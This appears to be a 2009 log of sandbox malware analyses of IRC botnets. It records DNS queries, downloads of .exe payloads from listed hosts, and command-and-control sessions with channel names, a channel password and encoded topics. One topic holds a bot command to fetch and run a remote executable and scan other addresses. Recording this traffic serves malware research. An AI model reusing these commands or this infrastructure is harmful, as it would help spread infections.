Month: May 2009

serv01.colo.owned.hu/foro.melodiasmoviles.com

– DNS Queries:
  serv01.colo.owned.hu DNS_TYPE_A 87.234.140.73 1
  foro.melodiasmoviles.com DNS_TYPE_A 1
– HTTP Conversations: From ANUBIS:1033 to 74.52.56.242:80 – [foro.melodiasmoviles.com]
  Request: GET /…/lol.exe
  Response: 200 “OK”
– IRC Conversations: 87.234.140.73:31091
  Nick: user|61
  Username: user|61
  Joined Channel: #support# with Password syslock
  Channel Topic for Channel #support#: “! dlx foro.melodiasmoviles.com/…/sshbx5.exe;! scanexec tty1.exe $ip 0”

teek.ihshsd8.com (Baadshah from #bottalk next server)

– DNS Queries:
  teek.ihshsd8.com
– HTTP Conversations: From ANUBIS:1039 to 72.10.169.26:80 – [72.10.169.26]
  Request: GET /newpack.exe
  Response: 200 “OK”
– IRC Conversations: From ANUBIS:1034 to 72.10.172.218:9928
  Nick: QkmESFPj
  Username: keiqyl
  Joined Channel: #siwa
  Channel Topic for Channel #siwa: “=sns+a5P/xtPiMMQV3WArMqVpEo5yf63afj9I5m9v8Yb8jQyjvrOao6a1D2ggD/yKpW9RhWz0X53yvkkpx6XNxUvY9j4LTZ4T50pVxGMhIxZj7mZxfpCQ2yznwKlKtnHwcB”

rs.wtfbbqz.info

– IRC Conversations: 221.11.6.203:7007
  Nick: [P00|USA|31740]
  Username: XP-4976
  Joined Channel: ##security

xx.ka3ek.com/channellili5.com/zonetech.info

– DNS Queries:
  Name  Query Type  Query Result  Successful  Protocol
  xx.ka3ek.com DNS_TYPE_A 67.43.226.242 1
  … DNS_TYPE_A 0
  channellili5.com DNS_TYPE_A 0
  zonetech.info DNS_TYPE_A 72.10.166.195 1
– HTTP Conversations: 72.10.166.195:80 – [zonetech.info]
  Request: GET /ns6.exe
  Response: 200 “OK”
– IRC Conversations: 67.43.226.242:8080
  Nick: VndhdZPk
  Username: nhympp
  Joined Channel: #las6
  Channel Topic for Channel #las6: “=AMZ7AvE/iLXeUnAvUfZPqMvDThxwZSF004FsQnPnjGBPYx8MEknE73CtRA2GdWniEL9hzXmawnM1YrBnc28RA/9z7kQh/g203Sh+tcfAj7W8ar0Ag0HcmdwB7KTzFAe3dlqfGsZ/YaUNJjJvhXKQ+8tnPxENLQqy3mmwMYFsGbuCnShS3fqKrOolhS8UGlttitdMDTAUIXTTgWxC”
  Private Message to Channel #las6: “-^C042^C- Running TFTP wormride

proxim.ntkrnlpa.info

– DNS Queries:
  proxim.ntkrnlpa.info
– IRC Conversations: 83.68.16.30:80
  Nick: znmipply
  Username: z020501
  Private Message to User &virtu3: “”
– DNS Queries:
  millanchannel.info
– HTTP Conversations: 67.18.161.250:80 – [millanchannel.info]
  Request: GET /uddb.exe
  Response: 200 “OK”
  Request: GET /uddb.exe
  Response: 200 “OK”

irc.johnny.gr

– DNS Queries:
  irc.johnny.gr
– IRC Conversations: 89.163.182.24:1836
  Nick: USA|97757
  Username: pesxw
  Joined Channel: ##pia

nadsam0.info and ss.ka3ek.com

– DNS Queries:
  Name  Query Type  Query Result  Successful  Protocol
  ss.ka3ek.com DNS_TYPE_A 67.43.232.36 1
  nadsam0.info DNS_TYPE_A 72.10.167.74 1
– HTTP Conversations: 72.10.167.74:80 – [nadsam0.info]
  Request: GET /x.exe
  Response: 200 “OK”
  Request: GET /is.exe
  Response: 200 “OK”
  Request: GET /laslas.exe
  Response: 200 “OK”
– IRC Conversations: 67.43.232.36:10324
  Nick: VyJodwfX
  Username: woowfk
  Joined Channel: #rs
  Joined Channel: #proxx
  Joined Channel: #kok6
  Joined Channel: #63
  Channel Topic for Channel

proxim.ircgalaxy.pl and dl2.teenpassage.com

– DNS Queries:
  proxim.ircgalaxy.pl DNS_TYPE_A 210.245.211.11 1
  wpad DNS_TYPE_A 0
  dl2.teenpassage.com DNS_TYPE_A 85.114.141.207 1
– HTTP Conversations: 85.114.141.207:80 – [dl2.teenpassage.com]
  Request: GET /DONT-TOUCH/pa.exe
– HTTP Conversations: 115.126.2.110:80 – [www.upononjob.cn]
  Request: GET /set/lgate.php
  Response: 200 “OK”
  Request: GET /docs/irv.txt
  Response: 200 “OK”
  Request: GET /docs/doc.txt
  Response: 200 “OK”
  Request: GET /docs/tips.txt
  Response: 200 “OK”
  Request: GET /in.cgi?0032
  Response:

millanchannel.info (Baadshah from #bottalk second botnet)

– DNS Queries:
  millanchannel.info
– HTTP Conversations: 92.48.75.63:80 – [millanchannel.info]
  Request: GET /uddb.exe
  Response: 200 “OK”
  Request: GET /uddb.exe
  Response: 304 “Not Modified”
– HTTP Conversations: 72.10.169.26:80 – [72.10.169.26]
  Request: GET /ssvc.exe
  Response: 200 “OK”
– IRC Conversations: 72.10.169.26:2569
  Nick: fpNWLXVf
  Username: ewambn
  Joined Channel: ##russia##
  Channel Topic for Channel ##russia##: “=dphtYucrsh1S2Lp/Iah/dudBcoYuLymU7nu+UAHBCer23eQTNteOzdaveWqqR8QeZx8vQyyqlxdq5hvnyYvtkRtc5r6f1fpdFZpTJvfpFzLWUE0CaSQhDN3yBqfMiB”

ssvc.exe infos
– DNS Queries:
  Name  Query Type  Query Result  Successful  Protocol
  s.bigolder.info DNS_TYPE_A